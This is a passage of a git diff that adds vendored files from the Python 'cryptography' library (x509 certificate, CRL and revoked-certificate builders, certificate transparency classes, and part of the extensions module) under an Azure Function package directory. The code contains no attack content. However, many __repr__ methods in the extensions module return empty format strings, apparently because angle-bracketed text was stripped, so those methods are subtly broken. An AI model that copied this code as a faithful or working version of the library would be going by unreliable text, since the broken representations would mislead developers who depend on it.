requestor's distinguished name. + """ + if not isinstance(name, Name): + raise TypeError("Expecting x509.Name object.") + if self._subject_name is not None: + raise ValueError("The subject name may only be set once.") + return CertificateBuilder( + self._issuer_name, + name, + self._public_key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def public_key( + self, + key: CERTIFICATE_PUBLIC_KEY_TYPES, + ) -> "CertificateBuilder": + """ + Sets the requestor's public key (as found in the signing request). + """ + if not isinstance( + key, + ( + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, + x25519.X25519PublicKey, + x448.X448PublicKey, + ), + ): + raise TypeError( + "Expecting one of DSAPublicKey, RSAPublicKey," + " EllipticCurvePublicKey, Ed25519PublicKey," + " Ed448PublicKey, X25519PublicKey, or " + "X448PublicKey." + ) + if self._public_key is not None: + raise ValueError("The public key may only be set once.") + return CertificateBuilder( + self._issuer_name, + self._subject_name, + key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def serial_number(self, number: int) -> "CertificateBuilder": + """ + Sets the certificate serial number. + """ + if not isinstance(number, int): + raise TypeError("Serial number must be of integral type.") + if self._serial_number is not None: + raise ValueError("The serial number may only be set once.") + if number <= 0: + raise ValueError("The serial number should be positive.") + + # ASN.1 integers are always signed, so most significant bit must be + # zero. + if number.bit_length() >= 160: # As defined in RFC 5280 + raise ValueError( + "The serial number should not be more than 159 " "bits." 
+ ) + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def not_valid_before( + self, time: datetime.datetime + ) -> "CertificateBuilder": + """ + Sets the certificate activation time. + """ + if not isinstance(time, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._not_valid_before is not None: + raise ValueError("The not valid before may only be set once.") + time = _convert_to_naive_utc_time(time) + if time < _EARLIEST_UTC_TIME: + raise ValueError( + "The not valid before date must be on or after" + " 1950 January 1." + ) + if self._not_valid_after is not None and time > self._not_valid_after: + raise ValueError( + "The not valid before date must be before the not valid after " + "date." + ) + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + self._serial_number, + time, + self._not_valid_after, + self._extensions, + ) + + def not_valid_after(self, time: datetime.datetime) -> "CertificateBuilder": + """ + Sets the certificate expiration time. + """ + if not isinstance(time, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._not_valid_after is not None: + raise ValueError("The not valid after may only be set once.") + time = _convert_to_naive_utc_time(time) + if time < _EARLIEST_UTC_TIME: + raise ValueError( + "The not valid after date must be on or after" + " 1950 January 1." + ) + if ( + self._not_valid_before is not None + and time < self._not_valid_before + ): + raise ValueError( + "The not valid after date must be after the not valid before " + "date." + ) + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + self._serial_number, + self._not_valid_before, + time, + self._extensions, + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "CertificateBuilder": + """ + Adds an X.509 extension to the certificate. + """ + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions + [extension], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + backend: typing.Any = None, + ) -> Certificate: + """ + Signs the certificate using the CA's private key.
+ """ + if self._subject_name is None: + raise ValueError("A certificate must have a subject name") + + if self._issuer_name is None: + raise ValueError("A certificate must have an issuer name") + + if self._serial_number is None: + raise ValueError("A certificate must have a serial number") + + if self._not_valid_before is None: + raise ValueError("A certificate must have a not valid before time") + + if self._not_valid_after is None: + raise ValueError("A certificate must have a not valid after time") + + if self._public_key is None: + raise ValueError("A certificate must have a public key") + + return rust_x509.create_x509_certificate(self, private_key, algorithm) + + +class CertificateRevocationListBuilder: + _extensions: typing.List[Extension[ExtensionType]] + _revoked_certificates: typing.List[RevokedCertificate] + + def __init__( + self, + issuer_name: typing.Optional[Name] = None, + last_update: typing.Optional[datetime.datetime] = None, + next_update: typing.Optional[datetime.datetime] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + revoked_certificates: typing.List[RevokedCertificate] = [], + ): + self._issuer_name = issuer_name + self._last_update = last_update + self._next_update = next_update + self._extensions = extensions + self._revoked_certificates = revoked_certificates + + def issuer_name( + self, issuer_name: Name + ) -> "CertificateRevocationListBuilder": + if not isinstance(issuer_name, Name): + raise TypeError("Expecting x509.Name object.") + if self._issuer_name is not None: + raise ValueError("The issuer name may only be set once.") + return CertificateRevocationListBuilder( + issuer_name, + self._last_update, + self._next_update, + self._extensions, + self._revoked_certificates, + ) + + def last_update( + self, last_update: datetime.datetime + ) -> "CertificateRevocationListBuilder": + if not isinstance(last_update, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._last_update is not None: + raise ValueError("Last update may only be set once.") + last_update = _convert_to_naive_utc_time(last_update) + if last_update < _EARLIEST_UTC_TIME: + raise ValueError( + "The last update date must be on or after" " 1950 January 1." + ) + if self._next_update is not None and last_update > self._next_update: + raise ValueError( + "The last update date must be before the next update date." + ) + return CertificateRevocationListBuilder( + self._issuer_name, + last_update, + self._next_update, + self._extensions, + self._revoked_certificates, + ) + + def next_update( + self, next_update: datetime.datetime + ) -> "CertificateRevocationListBuilder": + if not isinstance(next_update, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._next_update is not None: + raise ValueError("Next update may only be set once.") + next_update = _convert_to_naive_utc_time(next_update) + if next_update < _EARLIEST_UTC_TIME: + raise ValueError( + "The next update date must be on or after" " 1950 January 1." + ) + if self._last_update is not None and next_update < self._last_update: + raise ValueError( + "The next update date must be after the last update date." + ) + return CertificateRevocationListBuilder( + self._issuer_name, + self._last_update, + next_update, + self._extensions, + self._revoked_certificates, + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "CertificateRevocationListBuilder": + """ + Adds an X.509 extension to the certificate revocation list.
+ """ + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + return CertificateRevocationListBuilder( + self._issuer_name, + self._last_update, + self._next_update, + self._extensions + [extension], + self._revoked_certificates, + ) + + def add_revoked_certificate( + self, revoked_certificate: RevokedCertificate + ) -> "CertificateRevocationListBuilder": + """ + Adds a revoked certificate to the CRL. + """ + if not isinstance(revoked_certificate, RevokedCertificate): + raise TypeError("Must be an instance of RevokedCertificate") + + return CertificateRevocationListBuilder( + self._issuer_name, + self._last_update, + self._next_update, + self._extensions, + self._revoked_certificates + [revoked_certificate], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + backend: typing.Any = None, + ) -> CertificateRevocationList: + if self._issuer_name is None: + raise ValueError("A CRL must have an issuer name") + + if self._last_update is None: + raise ValueError("A CRL must have a last update time") + + if self._next_update is None: + raise ValueError("A CRL must have a next update time") + + return rust_x509.create_x509_crl(self, private_key, algorithm) + + +class RevokedCertificateBuilder: + def __init__( + self, + serial_number: typing.Optional[int] = None, + revocation_date: typing.Optional[datetime.datetime] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + ): + self._serial_number = serial_number + self._revocation_date = revocation_date + self._extensions = extensions + + def serial_number(self, number: int) -> "RevokedCertificateBuilder": + if not isinstance(number, int): + raise TypeError("Serial number must be of integral type.") + if self._serial_number is not None: + raise ValueError("The serial number may only be set once.") + if number <= 0: + raise ValueError("The serial number should be positive") + + # ASN.1 integers are always signed, so most significant bit must be + # zero. + if number.bit_length() >= 160: # As defined in RFC 5280 + raise ValueError( + "The serial number should not be more than 159 " "bits." + ) + return RevokedCertificateBuilder( + number, self._revocation_date, self._extensions + ) + + def revocation_date( + self, time: datetime.datetime + ) -> "RevokedCertificateBuilder": + if not isinstance(time, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._revocation_date is not None: + raise ValueError("The revocation date may only be set once.") + time = _convert_to_naive_utc_time(time) + if time < _EARLIEST_UTC_TIME: + raise ValueError( + "The revocation date must be on or after" " 1950 January 1." 
+ ) + return RevokedCertificateBuilder( + self._serial_number, time, self._extensions + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "RevokedCertificateBuilder": + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + return RevokedCertificateBuilder( + self._serial_number, + self._revocation_date, + self._extensions + [extension], + ) + + def build(self, backend: typing.Any = None) -> RevokedCertificate: + if self._serial_number is None: + raise ValueError("A revoked certificate must have a serial number") + if self._revocation_date is None: + raise ValueError( + "A revoked certificate must have a revocation date" + ) + return _RawRevokedCertificate( + self._serial_number, + self._revocation_date, + Extensions(self._extensions), + ) + + +def random_serial_number() -> int: + return int.from_bytes(os.urandom(20), "big") >> 1 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/certificate_transparency.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/certificate_transparency.py new file mode 100644 index 0000000..eacdb34 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/certificate_transparency.py @@ -0,0 +1,48 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import datetime + +from cryptography import utils +from cryptography.hazmat.bindings._rust import x509 as rust_x509 + + +class LogEntryType(utils.Enum): + X509_CERTIFICATE = 0 + PRE_CERTIFICATE = 1 + + +class Version(utils.Enum): + v1 = 0 + + +class SignedCertificateTimestamp(metaclass=abc.ABCMeta): + @abc.abstractproperty + def version(self) -> Version: + """ + Returns the SCT version. + """ + + @abc.abstractproperty + def log_id(self) -> bytes: + """ + Returns an identifier indicating which log this SCT is for. + """ + + @abc.abstractproperty + def timestamp(self) -> datetime.datetime: + """ + Returns the timestamp for this SCT. + """ + + @abc.abstractproperty + def entry_type(self) -> LogEntryType: + """ + Returns whether this is an SCT for a certificate or pre-certificate. + """ + + +SignedCertificateTimestamp.register(rust_x509.Sct) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/extensions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/extensions.py new file mode 100644 index 0000000..784a080 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/extensions.py @@ -0,0 +1,2103 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ + +import abc +import datetime +import hashlib +import ipaddress +import typing + +from cryptography import utils +from cryptography.hazmat.bindings._rust import asn1 +from cryptography.hazmat.bindings._rust import x509 as rust_x509 +from cryptography.hazmat.primitives import constant_time, serialization +from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey +from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + CERTIFICATE_PUBLIC_KEY_TYPES, +) +from cryptography.x509.certificate_transparency import ( + SignedCertificateTimestamp, +) +from cryptography.x509.general_name import ( + DNSName, + DirectoryName, + GeneralName, + IPAddress, + OtherName, + RFC822Name, + RegisteredID, + UniformResourceIdentifier, + _IPADDRESS_TYPES, +) +from cryptography.x509.name import Name, RelativeDistinguishedName +from cryptography.x509.oid import ( + CRLEntryExtensionOID, + ExtensionOID, + OCSPExtensionOID, + ObjectIdentifier, +) + +ExtensionTypeVar = typing.TypeVar( + "ExtensionTypeVar", bound="ExtensionType", covariant=True +) + + +def _key_identifier_from_public_key( + public_key: CERTIFICATE_PUBLIC_KEY_TYPES, +) -> bytes: + if isinstance(public_key, RSAPublicKey): + data = public_key.public_bytes( + serialization.Encoding.DER, + serialization.PublicFormat.PKCS1, + ) + elif isinstance(public_key, EllipticCurvePublicKey): + data = public_key.public_bytes( + serialization.Encoding.X962, + serialization.PublicFormat.UncompressedPoint, + ) + else: + # This is a very slow way to do this. + serialized = public_key.public_bytes( + serialization.Encoding.DER, + serialization.PublicFormat.SubjectPublicKeyInfo, + ) + data = asn1.parse_spki_for_data(serialized) + + return hashlib.sha1(data).digest() + + +def _make_sequence_methods(field_name: str): + def len_method(self) -> int: + return len(getattr(self, field_name)) + + def iter_method(self): + return iter(getattr(self, field_name)) + + def getitem_method(self, idx): + return getattr(self, field_name)[idx] + + return len_method, iter_method, getitem_method + + +class DuplicateExtension(Exception): + def __init__(self, msg: str, oid: ObjectIdentifier) -> None: + super(DuplicateExtension, self).__init__(msg) + self.oid = oid + + +class ExtensionNotFound(Exception): + def __init__(self, msg: str, oid: ObjectIdentifier) -> None: + super(ExtensionNotFound, self).__init__(msg) + self.oid = oid + + +class ExtensionType(metaclass=abc.ABCMeta): + oid: typing.ClassVar[ObjectIdentifier] + + def public_bytes(self) -> bytes: + """ + Serializes the extension type to DER. + """ + raise NotImplementedError( + "public_bytes is not implemented for extension type {0!r}".format( + self + ) + ) + + +class Extensions: + def __init__( + self, extensions: typing.Iterable["Extension[ExtensionType]"] + ) -> None: + self._extensions = list(extensions) + + def get_extension_for_oid( + self, oid: ObjectIdentifier + ) -> "Extension[ExtensionType]": + for ext in self: + if ext.oid == oid: + return ext + + raise ExtensionNotFound("No {} extension was found".format(oid), oid) + + def get_extension_for_class( + self, extclass: typing.Type[ExtensionTypeVar] + ) -> "Extension[ExtensionTypeVar]": + if extclass is UnrecognizedExtension: + raise TypeError( + "UnrecognizedExtension can't be used with " + "get_extension_for_class because more than one instance of the" + " class may be present." 
+ ) + + for ext in self: + if isinstance(ext.value, extclass): + return ext + + raise ExtensionNotFound( + "No {} extension was found".format(extclass), extclass.oid + ) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_extensions") + + def __repr__(self) -> str: + return "".format(self._extensions) + + +class CRLNumber(ExtensionType): + oid = ExtensionOID.CRL_NUMBER + + def __init__(self, crl_number: int) -> None: + if not isinstance(crl_number, int): + raise TypeError("crl_number must be an integer") + + self._crl_number = crl_number + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CRLNumber): + return NotImplemented + + return self.crl_number == other.crl_number + + def __hash__(self) -> int: + return hash(self.crl_number) + + def __repr__(self) -> str: + return "".format(self.crl_number) + + @property + def crl_number(self) -> int: + return self._crl_number + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class AuthorityKeyIdentifier(ExtensionType): + oid = ExtensionOID.AUTHORITY_KEY_IDENTIFIER + + def __init__( + self, + key_identifier: typing.Optional[bytes], + authority_cert_issuer: typing.Optional[typing.Iterable[GeneralName]], + authority_cert_serial_number: typing.Optional[int], + ) -> None: + if (authority_cert_issuer is None) != ( + authority_cert_serial_number is None + ): + raise ValueError( + "authority_cert_issuer and authority_cert_serial_number " + "must both be present or both None" + ) + + if authority_cert_issuer is not None: + authority_cert_issuer = list(authority_cert_issuer) + if not all( + isinstance(x, GeneralName) for x in authority_cert_issuer + ): + raise TypeError( + "authority_cert_issuer must be a list of GeneralName " + "objects" + ) + + if authority_cert_serial_number is not None and not isinstance( + authority_cert_serial_number, int + ): + raise TypeError("authority_cert_serial_number must be an integer") + + self._key_identifier = key_identifier + self._authority_cert_issuer = authority_cert_issuer + self._authority_cert_serial_number = authority_cert_serial_number + + # This takes a subset of CERTIFICATE_PUBLIC_KEY_TYPES because an issuer + # cannot have an X25519/X448 key. This introduces some unfortunate + # asymmetry that requires typing users to explicitly + # narrow their type, but we should make this accurate and not just + # convenient. 
+ @classmethod + def from_issuer_public_key( + cls, public_key: CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES + ) -> "AuthorityKeyIdentifier": + digest = _key_identifier_from_public_key(public_key) + return cls( + key_identifier=digest, + authority_cert_issuer=None, + authority_cert_serial_number=None, + ) + + @classmethod + def from_issuer_subject_key_identifier( + cls, ski: "SubjectKeyIdentifier" + ) -> "AuthorityKeyIdentifier": + return cls( + key_identifier=ski.digest, + authority_cert_issuer=None, + authority_cert_serial_number=None, + ) + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, AuthorityKeyIdentifier): + return NotImplemented + + return ( + self.key_identifier == other.key_identifier + and self.authority_cert_issuer == other.authority_cert_issuer + and self.authority_cert_serial_number + == other.authority_cert_serial_number + ) + + def __hash__(self) -> int: + if self.authority_cert_issuer is None: + aci = None + else: + aci = tuple(self.authority_cert_issuer) + return hash( + (self.key_identifier, aci, self.authority_cert_serial_number) + ) + + @property + def key_identifier(self) -> typing.Optional[bytes]: + return self._key_identifier + + @property + def authority_cert_issuer( + self, + ) -> typing.Optional[typing.List[GeneralName]]: + return self._authority_cert_issuer + + @property + def authority_cert_serial_number(self) -> typing.Optional[int]: + return self._authority_cert_serial_number + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class SubjectKeyIdentifier(ExtensionType): + oid = ExtensionOID.SUBJECT_KEY_IDENTIFIER + + def __init__(self, digest: bytes) -> None: + self._digest = digest + + @classmethod + def from_public_key( + cls, public_key: CERTIFICATE_PUBLIC_KEY_TYPES + ) -> "SubjectKeyIdentifier": + return cls(_key_identifier_from_public_key(public_key)) + + @property + def digest(self) -> bytes: + return self._digest + + @property + def key_identifier(self) -> bytes: + return self._digest + + def __repr__(self) -> str: + return "".format(self.digest) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, SubjectKeyIdentifier): + return NotImplemented + + return constant_time.bytes_eq(self.digest, other.digest) + + def __hash__(self) -> int: + return hash(self.digest) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class AuthorityInformationAccess(ExtensionType): + oid = ExtensionOID.AUTHORITY_INFORMATION_ACCESS + + def __init__( + self, descriptions: typing.Iterable["AccessDescription"] + ) -> None: + descriptions = list(descriptions) + if not all(isinstance(x, AccessDescription) for x in descriptions): + raise TypeError( + "Every item in the descriptions list must be an " + "AccessDescription" + ) + + self._descriptions = descriptions + + __len__, __iter__, __getitem__ = _make_sequence_methods("_descriptions") + + def __repr__(self) -> str: + return "".format(self._descriptions) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, AuthorityInformationAccess): + return NotImplemented + + return self._descriptions == other._descriptions + + def __hash__(self) -> int: + return hash(tuple(self._descriptions)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class SubjectInformationAccess(ExtensionType): + oid = ExtensionOID.SUBJECT_INFORMATION_ACCESS + + def __init__( + self, descriptions: typing.Iterable["AccessDescription"] + 
) -> None: + descriptions = list(descriptions) + if not all(isinstance(x, AccessDescription) for x in descriptions): + raise TypeError( + "Every item in the descriptions list must be an " + "AccessDescription" + ) + + self._descriptions = descriptions + + __len__, __iter__, __getitem__ = _make_sequence_methods("_descriptions") + + def __repr__(self) -> str: + return "".format(self._descriptions) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, SubjectInformationAccess): + return NotImplemented + + return self._descriptions == other._descriptions + + def __hash__(self) -> int: + return hash(tuple(self._descriptions)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class AccessDescription: + def __init__( + self, access_method: ObjectIdentifier, access_location: GeneralName + ) -> None: + if not isinstance(access_method, ObjectIdentifier): + raise TypeError("access_method must be an ObjectIdentifier") + + if not isinstance(access_location, GeneralName): + raise TypeError("access_location must be a GeneralName") + + self._access_method = access_method + self._access_location = access_location + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, AccessDescription): + return NotImplemented + + return ( + self.access_method == other.access_method + and self.access_location == other.access_location + ) + + def __hash__(self) -> int: + return hash((self.access_method, self.access_location)) + + @property + def access_method(self) -> ObjectIdentifier: + return self._access_method + + @property + def access_location(self) -> GeneralName: + return self._access_location + + +class BasicConstraints(ExtensionType): + oid = ExtensionOID.BASIC_CONSTRAINTS + + def __init__(self, ca: bool, path_length: typing.Optional[int]) -> None: + if not isinstance(ca, bool): + raise TypeError("ca must be a boolean value") + + if path_length is not None and not ca: + raise ValueError("path_length must be None when ca is False") + + if path_length is not None and ( + not isinstance(path_length, int) or path_length < 0 + ): + raise TypeError( + "path_length must be a non-negative integer or None" + ) + + self._ca = ca + self._path_length = path_length + + @property + def ca(self) -> bool: + return self._ca + + @property + def path_length(self) -> typing.Optional[int]: + return self._path_length + + def __repr__(self) -> str: + return ( + "" + ).format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, BasicConstraints): + return NotImplemented + + return self.ca == other.ca and self.path_length == other.path_length + + def __hash__(self) -> int: + return hash((self.ca, self.path_length)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class DeltaCRLIndicator(ExtensionType): + oid = ExtensionOID.DELTA_CRL_INDICATOR + + def __init__(self, crl_number: int) -> None: + if not isinstance(crl_number, int): + raise TypeError("crl_number must be an integer") + + self._crl_number = crl_number + + @property + def crl_number(self) -> int: + return self._crl_number + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DeltaCRLIndicator): + return NotImplemented + + return self.crl_number == other.crl_number + + def __hash__(self) -> int: + return hash(self.crl_number) + + def __repr__(self) -> str: + return "".format(self) + + def public_bytes(self) -> bytes: + return 
rust_x509.encode_extension_value(self) + + +class CRLDistributionPoints(ExtensionType): + oid = ExtensionOID.CRL_DISTRIBUTION_POINTS + + def __init__( + self, distribution_points: typing.Iterable["DistributionPoint"] + ) -> None: + distribution_points = list(distribution_points) + if not all( + isinstance(x, DistributionPoint) for x in distribution_points + ): + raise TypeError( + "distribution_points must be a list of DistributionPoint " + "objects" + ) + + self._distribution_points = distribution_points + + __len__, __iter__, __getitem__ = _make_sequence_methods( + "_distribution_points" + ) + + def __repr__(self) -> str: + return "".format(self._distribution_points) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CRLDistributionPoints): + return NotImplemented + + return self._distribution_points == other._distribution_points + + def __hash__(self) -> int: + return hash(tuple(self._distribution_points)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class FreshestCRL(ExtensionType): + oid = ExtensionOID.FRESHEST_CRL + + def __init__( + self, distribution_points: typing.Iterable["DistributionPoint"] + ) -> None: + distribution_points = list(distribution_points) + if not all( + isinstance(x, DistributionPoint) for x in distribution_points + ): + raise TypeError( + "distribution_points must be a list of DistributionPoint " + "objects" + ) + + self._distribution_points = distribution_points + + __len__, __iter__, __getitem__ = _make_sequence_methods( + "_distribution_points" + ) + + def __repr__(self) -> str: + return "".format(self._distribution_points) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, FreshestCRL): + return NotImplemented + + return self._distribution_points == other._distribution_points + + def __hash__(self) -> int: + return hash(tuple(self._distribution_points)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class DistributionPoint: + def __init__( + self, + full_name: typing.Optional[typing.Iterable[GeneralName]], + relative_name: typing.Optional[RelativeDistinguishedName], + reasons: typing.Optional[typing.FrozenSet["ReasonFlags"]], + crl_issuer: typing.Optional[typing.Iterable[GeneralName]], + ) -> None: + if full_name and relative_name: + raise ValueError( + "You cannot provide both full_name and relative_name, at " + "least one must be None." 
+ ) + + if full_name is not None: + full_name = list(full_name) + if not all(isinstance(x, GeneralName) for x in full_name): + raise TypeError( + "full_name must be a list of GeneralName objects" + ) + + if relative_name: + if not isinstance(relative_name, RelativeDistinguishedName): + raise TypeError( + "relative_name must be a RelativeDistinguishedName" + ) + + if crl_issuer is not None: + crl_issuer = list(crl_issuer) + if not all(isinstance(x, GeneralName) for x in crl_issuer): + raise TypeError( + "crl_issuer must be None or a list of general names" + ) + + if reasons and ( + not isinstance(reasons, frozenset) + or not all(isinstance(x, ReasonFlags) for x in reasons) + ): + raise TypeError("reasons must be None or frozenset of ReasonFlags") + + if reasons and ( + ReasonFlags.unspecified in reasons + or ReasonFlags.remove_from_crl in reasons + ): + raise ValueError( + "unspecified and remove_from_crl are not valid reasons in a " + "DistributionPoint" + ) + + if reasons and not crl_issuer and not (full_name or relative_name): + raise ValueError( + "You must supply crl_issuer, full_name, or relative_name when " + "reasons is not None" + ) + + self._full_name = full_name + self._relative_name = relative_name + self._reasons = reasons + self._crl_issuer = crl_issuer + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DistributionPoint): + return NotImplemented + + return ( + self.full_name == other.full_name + and self.relative_name == other.relative_name + and self.reasons == other.reasons + and self.crl_issuer == other.crl_issuer + ) + + def __hash__(self) -> int: + if self.full_name is not None: + fn: typing.Optional[typing.Tuple[GeneralName, ...]] = tuple( + self.full_name + ) + else: + fn = None + + if self.crl_issuer is not None: + crl_issuer: typing.Optional[ + typing.Tuple[GeneralName, ...] + ] = tuple(self.crl_issuer) + else: + crl_issuer = None + + return hash((fn, self.relative_name, self.reasons, crl_issuer)) + + @property + def full_name(self) -> typing.Optional[typing.List[GeneralName]]: + return self._full_name + + @property + def relative_name(self) -> typing.Optional[RelativeDistinguishedName]: + return self._relative_name + + @property + def reasons(self) -> typing.Optional[typing.FrozenSet["ReasonFlags"]]: + return self._reasons + + @property + def crl_issuer(self) -> typing.Optional[typing.List[GeneralName]]: + return self._crl_issuer + + +class ReasonFlags(utils.Enum): + unspecified = "unspecified" + key_compromise = "keyCompromise" + ca_compromise = "cACompromise" + affiliation_changed = "affiliationChanged" + superseded = "superseded" + cessation_of_operation = "cessationOfOperation" + certificate_hold = "certificateHold" + privilege_withdrawn = "privilegeWithdrawn" + aa_compromise = "aACompromise" + remove_from_crl = "removeFromCRL" + + +# These are distribution point bit string mappings. Not to be confused with +# CRLReason reason flags bit string mappings. 
+# ReasonFlags ::= BIT STRING { +# unused (0), +# keyCompromise (1), +# cACompromise (2), +# affiliationChanged (3), +# superseded (4), +# cessationOfOperation (5), +# certificateHold (6), +# privilegeWithdrawn (7), +# aACompromise (8) } +_REASON_BIT_MAPPING = { + 1: ReasonFlags.key_compromise, + 2: ReasonFlags.ca_compromise, + 3: ReasonFlags.affiliation_changed, + 4: ReasonFlags.superseded, + 5: ReasonFlags.cessation_of_operation, + 6: ReasonFlags.certificate_hold, + 7: ReasonFlags.privilege_withdrawn, + 8: ReasonFlags.aa_compromise, +} + + +class PolicyConstraints(ExtensionType): + oid = ExtensionOID.POLICY_CONSTRAINTS + + def __init__( + self, + require_explicit_policy: typing.Optional[int], + inhibit_policy_mapping: typing.Optional[int], + ) -> None: + if require_explicit_policy is not None and not isinstance( + require_explicit_policy, int + ): + raise TypeError( + "require_explicit_policy must be a non-negative integer or " + "None" + ) + + if inhibit_policy_mapping is not None and not isinstance( + inhibit_policy_mapping, int + ): + raise TypeError( + "inhibit_policy_mapping must be a non-negative integer or None" + ) + + if inhibit_policy_mapping is None and require_explicit_policy is None: + raise ValueError( + "At least one of require_explicit_policy and " + "inhibit_policy_mapping must not be None" + ) + + self._require_explicit_policy = require_explicit_policy + self._inhibit_policy_mapping = inhibit_policy_mapping + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PolicyConstraints): + return NotImplemented + + return ( + self.require_explicit_policy == other.require_explicit_policy + and self.inhibit_policy_mapping == other.inhibit_policy_mapping + ) + + def __hash__(self) -> int: + return hash( + (self.require_explicit_policy, self.inhibit_policy_mapping) + ) + + @property + def require_explicit_policy(self) -> typing.Optional[int]: + return self._require_explicit_policy + + @property + def inhibit_policy_mapping(self) -> typing.Optional[int]: + return self._inhibit_policy_mapping + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class CertificatePolicies(ExtensionType): + oid = ExtensionOID.CERTIFICATE_POLICIES + + def __init__(self, policies: typing.Iterable["PolicyInformation"]) -> None: + policies = list(policies) + if not all(isinstance(x, PolicyInformation) for x in policies): + raise TypeError( + "Every item in the policies list must be a " + "PolicyInformation" + ) + + self._policies = policies + + __len__, __iter__, __getitem__ = _make_sequence_methods("_policies") + + def __repr__(self) -> str: + return "".format(self._policies) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CertificatePolicies): + return NotImplemented + + return self._policies == other._policies + + def __hash__(self) -> int: + return hash(tuple(self._policies)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class PolicyInformation: + def __init__( + self, + policy_identifier: ObjectIdentifier, + policy_qualifiers: typing.Optional[ + typing.Iterable[typing.Union[str, "UserNotice"]] + ], + ) -> None: + if not isinstance(policy_identifier, ObjectIdentifier): + raise TypeError("policy_identifier must be an ObjectIdentifier") + + self._policy_identifier = policy_identifier + + if policy_qualifiers is not None: + policy_qualifiers = list(policy_qualifiers) + if not all( + isinstance(x, (str, UserNotice)) for x 
